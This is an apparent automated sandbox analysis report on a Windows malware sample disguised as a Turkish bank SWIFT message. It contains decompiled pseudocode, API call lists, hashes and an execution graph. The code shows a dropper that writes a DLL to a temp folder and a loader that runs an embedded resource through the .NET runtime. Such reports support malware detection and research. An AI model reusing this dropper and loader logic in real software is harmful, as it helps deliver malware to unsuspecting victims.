                                  					if(_a8 != 0x200) {
                                  						_t22 = _a16;
                                  						L7:
                                  						if(_a8 == 0x419 &&  *0x420480 != _t22) {
                                  							 *0x420480 = _t22;
                                  							E00405A85(0x420498, 0x424000);
                                  							E004059E3(0x424000, _t22);
                                  							E0040140B(6);
                                  							E00405A85(0x424000, 0x420498);
                                  						}
                                  						L11:
                                  						return CallWindowProcA( *0x420488, _a4, _a8, _a12, _t22);
                                  					}
                                  					if(IsWindowVisible(_a4) == 0) {
                                  						L10:
                                  						_t22 = _a16;
                                  						goto L11;
                                  					}
                                  					_t22 = E004046F2(_a4, 1);
                                  					_a8 = 0x419;
                                  					goto L7;
                                  				}
                                  				if(_a12 != 0x20) {
                                  					goto L10;
                                  				}
                                  				E00403E83(0x413);
                                  				return 0;
                                  			}




                                  0x00404d7f
                                  0x00404da4
                                  0x00404dc4
                                  0x00404dc7
                                  0x00404dca
                                  0x00404de1
                                  0x00404de7
                                  0x00404dee
                                  0x00404df5
                                  0x00404dfc
                                  0x00404e01
                                  0x00404e07
                                  0x00000000
                                  0x00404e17
                                  0x00404db1
                                  0x00404e04
                                  0x00404e04
                                  0x00000000
                                  0x00404e04
                                  0x00404dbd
                                  0x00404dbf
                                  0x00000000
                                  0x00404dbf
                                  0x00404d85
                                  0x00000000
                                  0x00000000
                                  0x00404d8c
                                  0x00000000

                                  APIs
                                  • IsWindowVisible.USER32 ref: 00404DA9
                                  • CallWindowProcA.USER32 ref: 00404E17
                                    • Part of subcall function 00403E83: SendMessageA.USER32 ref: 00403E95
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: Window$CallMessageProcSendVisible
                                  • String ID:
                                  • API String ID: 3748168415-3916222277
                                  • Opcode ID: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
                                  • Instruction ID: ec2fcea156de3e0d4d2633a939c9d5c5ec8f09c93be26486dc307f4b459a9b20
                                  • Opcode Fuzzy Hash: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
                                  • Instruction Fuzzy Hash: B5116A71600208BBDB21AF51DC409AB3A69AB84769F00853AFB14691E2C3799D919FA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                                  				int _t5;
                                  				long _t7;
                                  				struct _OVERLAPPED* _t11;
                                  				intOrPtr* _t15;
                                  				void* _t17;
                                  				int _t21;
                                  
                                  				_t15 = __esi;
                                  				_t11 = __ebx;
                                  				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
                                  					_t7 = lstrlenA(E004029E8(0x11));
                                  				} else {
                                  					E004029CB(1);
                                  					 *0x409f68 = __al;
                                  				}
                                  				if( *_t15 == _t11) {
                                  					L8:
                                  					 *((intOrPtr*)(_t17 - 4)) = 1;
                                  				} else {
                                  					_t5 = WriteFile(E004059FC(_t17 + 8, _t15), "C:\Users\FRONTD~1\AppData\Local\Temp\nsyAE26.tmp\tkqqg.dll", _t7, _t17 + 8, _t11);
                                  					_t21 = _t5;
                                  					if(_t21 == 0) {
                                  						goto L8;
                                  					}
                                  				}
                                  				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t17 - 4));
                                  				return 0;
                                  			}









                                  0x004024b0
                                  0x004024b0
                                  0x004024b3
                                  0x004024ce
                                  0x004024b5
                                  0x004024b7
                                  0x004024bc
                                  0x004024c3
                                  0x004024d5
                                  0x0040264e
                                  0x0040264e
                                  0x004024db
                                  0x004024ed
                                  0x004015a6
                                  0x004015a8
                                  0x00000000
                                  0x004015ae
                                  0x004015a8
                                  0x00402880
                                  0x0040288c

                                  APIs
                                  • lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
                                  • WriteFile.KERNEL32(00000000,?,C:\Users\user~1\AppData\Local\Temp\nsyAE26.tmp\tkqqg.dll,00000000,?,?,00000000,00000011), ref: 004024ED
                                  Strings
                                  • C:\Users\user~1\AppData\Local\Temp\nsyAE26.tmp\tkqqg.dll, xrefs: 004024BC, 004024E1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: FileWritelstrlen
                                  • String ID: C:\Users\user~1\AppData\Local\Temp\nsyAE26.tmp\tkqqg.dll
                                  • API String ID: 427699356-904800869
                                  • Opcode ID: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
                                  • Instruction ID: fedee9c099d2663b98e8dec203c278837a510ba70d8909219c610135afd3ad6f
                                  • Opcode Fuzzy Hash: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
                                  • Instruction Fuzzy Hash: 89F0E9B2A44245BFD700EBF19E499AF36689B00345F20443BB141F50C2D6BC89419B2D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004055BF(char* _a4) {
                                  				char* _t3;
                                  				char* _t5;
                                  
                                  				_t5 = _a4;
                                  				_t3 =  &(_t5[lstrlenA(_t5)]);
                                  				while( *_t3 != 0x5c) {
                                  					_t3 = CharPrevA(_t5, _t3);
                                  					if(_t3 > _t5) {
                                  						continue;
                                  					}
                                  					break;
                                  				}
                                  				 *_t3 =  *_t3 & 0x00000000;
                                  				return  &(_t3[1]);
                                  			}





                                  0x004055c0
                                  0x004055ca
                                  0x004055cc
                                  0x004055d3
                                  0x004055db
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004055db
                                  0x004055dd
                                  0x004055e2

                                  APIs
                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe,C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe,80000000,00000003), ref: 004055C5
                                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe,C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe,80000000,00000003), ref: 004055D3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: CharPrevlstrlen
                                  • String ID: C:\Users\user\Desktop
                                  • API String ID: 2709904686-3976562730
                                  • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                  • Instruction ID: 41873d5d9910b4adf2dd72edffcb0a7ece880f135012a8254964d84567f142cd
                                  • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                  • Instruction Fuzzy Hash: 54D05E62408AB02EE30252109C00B8F7A98CB16300F194462E040A6194C2784C418EB9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004056D1(CHAR* _a4, CHAR* _a8) {
                                  				int _t10;
                                  				int _t15;
                                  				CHAR* _t16;
                                  
                                  				_t15 = lstrlenA(_a8);
                                  				_t16 = _a4;
                                  				while(lstrlenA(_t16) >= _t15) {
                                  					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                                  					_t10 = lstrcmpiA(_t16, _a8);
                                  					if(_t10 == 0) {
                                  						return _t16;
                                  					}
                                  					_t16 = CharNextA(_t16);
                                  				}
                                  				return 0;
                                  			}






                                  0x004056dd
                                  0x004056df
                                  0x00405707
                                  0x004056ec
                                  0x004056f1
                                  0x004056fc
                                  0x00000000
                                  0x00405719
                                  0x00405705
                                  0x00405705
                                  0x00000000

                                  APIs
                                  • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
                                  • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056F1
                                  • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004056FF
                                  • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: lstrlen$CharNextlstrcmpi
                                  • String ID:
                                  • API String ID: 190613189-0
                                  • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                  • Instruction ID: ab644034e2f35de8b9eb45aecd4941bea8d0256c976e6660c88f08d3bba40562
                                  • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                  • Instruction Fuzzy Hash: 93F0A73620DD62DAC3125B695C44A6F6F94EF91314F14457AF440F3141D3359812ABBF
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:32.3%
                                  Dynamic/Decrypted Code Coverage:45.7%
                                  Signature Coverage:13.4%
                                  Total number of Nodes:127
                                  Total number of Limit Nodes:12

                                  Graph

                                  execution_graph 55351 a8a8aa 55352 a8a8ff 55351->55352 55353 a8a8d6 SetErrorMode 55351->55353 55352->55353 55354 a8a8eb 55353->55354 55355 a8abaa 55356 a8abfa MkParseDisplayName 55355->55356 55357 a8ac08 55356->55357 55399 401723 55400 40172f ___scrt_is_nonwritable_in_current_image 55399->55400 55424 401985 55400->55424 55402 401736 55404 40175f 55402->55404 55453 401c88 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 55402->55453 55412 40179e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 55404->55412 55435 403480 55404->55435 55408 40177e ___scrt_is_nonwritable_in_current_image 55409 4017fe 55443 401da3 55409->55443 55411 401804 55447 401489 GetModuleHandleW FindResourceW 55411->55447 55412->55409 55454 4036df 40 API calls 3 library calls 55412->55454 55425 40198e 55424->55425 55455 40208d IsProcessorFeaturePresent 55425->55455 55427 40199a 55456 4025ba 10 API calls 4 library calls 55427->55456 55429 4019a3 55429->55402 55430 40199f 55430->55429 55457 403d3f IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 55430->55457 55432 4019ac 55433 4019ba 55432->55433 55458 4025e3 8 API calls 3 library calls 55432->55458 55433->55402 55437 403497 55435->55437 55459 4018cc 55437->55459 55438 401778 55438->55408 55439 403424 55438->55439 55441 403453 55439->55441 55440 4018cc _ValidateLocalCookies 5 API calls 55442 40347c 55440->55442 55441->55440 55442->55412 55467 402460 55443->55467 55446 401dc9 55446->55411 55448 4014ab GetModuleHandleW LoadResource 55447->55448 55449 4014ec ExitProcess 55447->55449 55450 4014e5 FreeResource 55448->55450 55451 4014bd LockResource GetModuleHandleW SizeofResource 55448->55451 55450->55449 55451->55450 55452 4014da 55451->55452 55452->55450 55453->55402 55454->55409 55455->55427 55456->55430 55457->55432 55458->55429 55460 4018d5 55459->55460 55461 4018d7 IsProcessorFeaturePresent 55459->55461 55460->55438 55463 401f6c 55461->55463 55466 401f30 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 55463->55466 55465 40204f 55465->55438 55466->55465 55468 401db6 GetStartupInfoW 55467->55468 55468->55446 55469 a8aa8e 55471 a8aac3 RegQueryValueExW 55469->55471 55472 a8ab17 55471->55472 55358 a8b3e2 55359 a8b432 FormatMessageW 55358->55359 55360 a8b43a 55359->55360 55361 824b48 55362 824b6c LdrInitializeThunk 55361->55362 55364 824bbe 55362->55364 55365 a8a7e6 55366 a8a85c 55365->55366 55367 a8a824 DuplicateHandle 55365->55367 55366->55367 55368 a8a832 55367->55368 55473 a8a986 55474 a8a9be RegOpenKeyExW 55473->55474 55476 a8aa14 55474->55476 55369 401711 55374 401e1d SetUnhandledExceptionFilter 55369->55374 55371 401716 _com_raise_error 55375 40382f 26 API calls 2 library calls 55371->55375 55373 401721 55374->55371 55375->55373 55376 a8b7ba 55377 a8b7ef K32GetModuleInformation 55376->55377 55379 a8b826 55377->55379 55380 a8afba 55381 a8afe9 AdjustTokenPrivileges 55380->55381 55383 a8b00b 55381->55383 55477 a8b8da 55478 a8b92a K32GetModuleFileNameExW 55477->55478 55479 a8b932 55478->55479 55480 a8be1e 55481 a8be59 LoadLibraryA 55480->55481 55483 a8be96 55481->55483 55484 a8ad9e 55486 a8adc7 LookupPrivilegeValueW 55484->55486 55487 a8adee 55486->55487 55384 a8acf2 55385 a8ad5d 55384->55385 55386 a8ad1e FindCloseChangeNotification 55384->55386 55385->55386 55387 a8ad2c 55386->55387 55488 a8a4d2 55489 a8a522 WSAStartup 55488->55489 55490 a8a52a 55489->55490 55491 a8b6d2 55493 a8b707 K32EnumProcessModules 55491->55493 55494 a8b736 55493->55494 55391 a8b136 55392 a8b16b NtQuerySystemInformation 55391->55392 55393 a8b196 55391->55393 55394 a8b180 55392->55394 55393->55392 55495 a8b2d6 55496 a8b30b TerminateProcess 55495->55496 55498 a8b334 55496->55498 55499 a8bb16 55500 a8bb66 GetUserNameW 55499->55500 55501 a8bb74 55500->55501 55502 40317f 55511 4055c5 GetEnvironmentStringsW 55502->55511 55507 4031cc 55508 4031a2 55519 403e03 20 API calls __dosmaperr 55508->55519 55510 403197 55520 403e03 20 API calls __dosmaperr 55510->55520 55512 403191 55511->55512 55513 4055d9 55511->55513 55512->55510 55518 4031d2 26 API calls 3 library calls 55512->55518 55521 403e3d 55513->55521 55515 4055ed 55528 403e03 20 API calls __dosmaperr 55515->55528 55517 405607 FreeEnvironmentStringsW 55517->55512 55518->55508 55519->55510 55520->55507 55522 403e7b 55521->55522 55527 403e4b __dosmaperr 55521->55527 55530 404831 20 API calls __dosmaperr 55522->55530 55524 403e66 RtlAllocateHeap 55525 403e79 55524->55525 55524->55527 55525->55515 55527->55522 55527->55524 55529 4068fd 7 API calls 2 library calls 55527->55529 55528->55517 55529->55527 55530->55525

                                  Executed Functions

                                  Control-flow Graph

                                  C-Code - Quality: 100%
                                  			E00401489() {
                                  				void* _v8;
                                  				struct HRSRC__* _t4;
                                  				long _t10;
                                  				struct HRSRC__* _t12;
                                  				void* _t16;
                                  
                                  				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
                                  				_t12 = _t4;
                                  				if(_t12 == 0) {
                                  					L6:
                                  					ExitProcess(0);
                                  				}
                                  				_t16 = LoadResource(GetModuleHandleW(0), _t12);
                                  				if(_t16 != 0) {
                                  					_v8 = LockResource(_t16);
                                  					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
                                  					_t13 = _v8;
                                  					if(_v8 != 0 && _t10 != 0) {
                                  						L00401000(_t13, _t10); // executed
                                  					}
                                  				}
                                  				FreeResource(_t16);
                                  				goto L6;
                                  			}








                                  0x0040149f
                                  0x004014a5
                                  0x004014a9
                                  0x004014ec
                                  0x004014ee
                                  0x004014ee
                                  0x004014b7
                                  0x004014bb
                                  0x004014c7
                                  0x004014cd
                                  0x004014d3
                                  0x004014d8
                                  0x004014e0
                                  0x004014e0
                                  0x004014d8
                                  0x004014e6
                                  0x00000000

                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
                                  • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
                                  • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
                                  • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
                                  • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
                                    • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
                                  • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
                                  • ExitProcess.KERNEL32 ref: 004014EE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.548601003.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                                  • String ID: v2.0.50727
                                  • API String ID: 2372384083-2350909873
                                  • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                                  • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
                                  • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                                  • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2579 8c9ce0-8c9df4 call 8ca880 2595 8c9e4a-8c9e54 2579->2595 2596 8c9df6-8c9e36 2579->2596 2599 8c9e5a-8c9e8a 2595->2599 2596->2595 2602 8c9e38-8c9e48 2596->2602 2606 8c9e8c-8c9e95 2599->2606 2607 8c9e9a-8ca1f7 2599->2607 2602->2599 2608 8ca86f-8ca87c 2606->2608 2646 8ca1fd-8ca20a 2607->2646 2647 8ca839-8ca85c 2607->2647 2648 8ca210-8ca25f 2646->2648 2649 8ca861-8ca86e 2646->2649 2647->2649 2648->2647 2660 8ca265-8ca281 2648->2660 2649->2608 2661 8ca292-8ca299 2660->2661 2662 8ca283-8ca28a 2660->2662 2661->2647 2664 8ca29f-8ca2da 2661->2664 2662->2647 2663 8ca290 2662->2663 2663->2664 2666 8ca2dc-8ca2f5 2664->2666 2667 8ca2f7-8ca2ff 2664->2667 2670 8ca302-8ca34a 2666->2670 2667->2670 2675 8ca820-8ca826 2670->2675 2676 8ca350-8ca3a7 2670->2676 2675->2647 2677 8ca828-8ca831 2675->2677 2676->2675 2683 8ca3ad-8ca3b7 2676->2683 2677->2648 2679 8ca837 2677->2679 2679->2649 2683->2675 2684 8ca3bd-8ca3d0 2683->2684 2684->2675 2685 8ca3d6-8ca3fb 2684->2685 2689 8ca7e1-8ca804 2685->2689 2690 8ca401-8ca404 2685->2690 2698 8ca809-8ca80f 2689->2698 2690->2689 2691 8ca40a-8ca43e LdrInitializeThunk 2690->2691 2699 8ca446-8ca496 2691->2699 2698->2647 2700 8ca811-8ca81a 2698->2700 2708 8ca49c-8ca4d8 2699->2708 2709 8ca5e0-8ca5e6 2699->2709 2700->2675 2700->2685 2713 8ca5fc-8ca602 2708->2713 2725 8ca4de-8ca513 2708->2725 2710 8ca5e8-8ca5ea 2709->2710 2711 8ca5f4 2709->2711 2710->2711 2711->2713 2714 8ca604-8ca606 2713->2714 2715 8ca610-8ca613 2713->2715 2714->2715 2717 8ca61e-8ca624 2715->2717 2719 8ca626-8ca628 2717->2719 2720 8ca632-8ca635 2717->2720 2719->2720 2722 8ca585-8ca5b5 2720->2722 2727 8ca5b7-8ca5d5 2722->2727 2731 8ca519-8ca53d 2725->2731 2732 8ca63a-8ca668 2725->2732 2734 8ca66d-8ca6c2 2727->2734 2735 8ca5db 2727->2735 2731->2732 2741 8ca543-8ca579 2731->2741 2732->2727 2754 8ca6cc-8ca6d2 2734->2754 2755 8ca6c4-8ca6ca 2734->2755 2735->2698 2741->2717 2753 8ca57f 2741->2753 2753->2722 2757 8ca6d4-8ca6d6 2754->2757 2758 8ca6e0 2754->2758 2756 8ca6e3-8ca702 2755->2756 2761 8ca71e-8ca79e 2756->2761 2762 8ca704-8ca70d 2756->2762 2757->2758 2758->2756 2776 8ca7a0-8ca7aa 2761->2776 2777 8ca7b1-8ca7df 2761->2777 2762->2761 2763 8ca70f-8ca717 2762->2763 2763->2761 2776->2777 2777->2698
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.551931123.00000000008C0000.00000040.00000010.sdmp, Offset: 008C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_8c0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 407a34cd962591e713d49d9ad741ab1c5468e49a8590a9fcc3027293c9d2c02e
                                  • Instruction ID: 970569abf3843823406338e4cc7f00f89fe367a58b0bbbcdbd1ade76a6cb6f3c
                                  • Opcode Fuzzy Hash: 407a34cd962591e713d49d9ad741ab1c5468e49a8590a9fcc3027293c9d2c02e
                                  • Instruction Fuzzy Hash: 41623B35A00219CFCB25DFA4C854B9EB7F6FF89304F1584A9E909AB261DB719D86CF40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 16122 823cc0-823d18 16129 823ef5-823eff 16122->16129 16130 823d1e-823d44 16122->16130 16134 823f05-823f2f 16130->16134 16135 823d4a-823d6c 16130->16135 16138 823f31-823f3b 16134->16138 16139 823f54-823fbb LdrInitializeThunk 16134->16139 16135->16129 16140 823d72-823d7b 16135->16140 16141 823f50-823f53 16138->16141 16142 823f3d-823f4e 16138->16142 16160 823fc2-823fce 16139->16160 16140->16134 16143 823d81-823d89 16140->16143 16142->16141 16144 823ee0-823ee4 16143->16144 16145 823d8f-823da2 16143->16145 16147 823f00 16144->16147 16148 823ee6-823eef 16144->16148 16155 823eca-823edb 16145->16155 16156 823da8-823dec 16145->16156 16147->16134 16148->16129 16148->16140 16155->16144 16156->16155 16184 823df2-823e0c 16156->16184 16163 824214-824227 16160->16163 16164 823fd4-823fdd 16160->16164 16165 82424e-824252 16163->16165 16166 823fe3-823ff8 16164->16166 16167 824249 16164->16167 16170 824254 16165->16170 16171 82425d 16165->16171 16174 824012-82402d 16166->16174 16175 823ffa-82400d 16166->16175 16167->16165 16170->16171 16176 82425e 16171->16176 16190 82403b 16174->16190 16191 82402f-824039 16174->16191 16177 8241e8-8241ec 16175->16177 16176->16176 16179 8241f7-824200 16177->16179 16180 8241ee 16177->16180 16186 824202-82420e 16179->16186 16187 824244 16179->16187 16180->16179 16184->16155 16192 823e12-823e28 16184->16192 16186->16163 16186->16164 16187->16167 16193 824040-824042 16190->16193 16191->16193 16192->16155 16199 823e2e-823e47 16192->16199 16194 824044-824057 16193->16194 16195 82405c-8240f4 16193->16195 16194->16177 16228 824102 16195->16228 16229 8240f6-824100 16195->16229 16199->16155 16205 823e4d-823e94 16199->16205 16218 823e96-823e9d 16205->16218 16219 823ea5-823ec8 16205->16219 16218->16219 16219->16144 16230 824107-824109 16228->16230 16229->16230 16231 82410b-82410d 16230->16231 16232 82415f-8241a3 16230->16232 16233 82411b 16231->16233 16234 82410f-824119 16231->16234 16247 8241b3-8241e6 16232->16247 16248 8241a5-8241ac 16232->16248 16235 824120-824122 16233->16235 16234->16235 16235->16232 16237 824124-82415d 16235->16237 16237->16232 16247->16177 16248->16247
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.551908161.0000000000820000.00000040.00000010.sdmp, Offset: 00820000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 84293acced7e6b68cee07f5d73d8a94510ffd5968f5c4d60c908107cbb300e94
                                  • Instruction ID: c81ff53b5d607471a2171155a13fa9712b6371ffb9ea20947b52d055426a1253
                                  • Opcode Fuzzy Hash: 84293acced7e6b68cee07f5d73d8a94510ffd5968f5c4d60c908107cbb300e94
                                  • Instruction Fuzzy Hash: 3AF13B30A00215CFCB14EBB8E554AAEBBF2FF88314F15856AD405EB395DB349D86CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00A8B003
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: AdjustPrivilegesToken
                                  • String ID:
                                  • API String ID: 2874748243-0
                                  • Opcode ID: aa8fad1c64c5824f4222c892a4332eeedcb9c87153ba0ffefff440eee6f009c7
                                  • Instruction ID: 859b6c7bc787645ec870d72ea0878b7d98464c310bd200901d7986c57ea51932
                                  • Opcode Fuzzy Hash: aa8fad1c64c5824f4222c892a4332eeedcb9c87153ba0ffefff440eee6f009c7
                                  • Instruction Fuzzy Hash: 7821D1765097849FEB228F25DC44B52BFB4EF16310F0885EAE9858F163D375E908CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtQuerySystemInformation.NTDLL ref: 00A8B171
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InformationQuerySystem
                                  • String ID:
                                  • API String ID: 3562636166-0
                                  • Opcode ID: d89679827f6c295576ceff975145bb1c47d1d4063effc9606b234d660b16ea42
                                  • Instruction ID: 8c20e224e42817fd99033b1e5ab77cef5be443ebf81d0c2409d530bcf1613a0d
                                  • Opcode Fuzzy Hash: d89679827f6c295576ceff975145bb1c47d1d4063effc9606b234d660b16ea42
                                  • Instruction Fuzzy Hash: 5B118E724097C49FDB228F15DC85A52FFB4EF16314F0984DAE9848F163D266A908CB72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00A8B003
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: AdjustPrivilegesToken
                                  • String ID:
                                  • API String ID: 2874748243-0
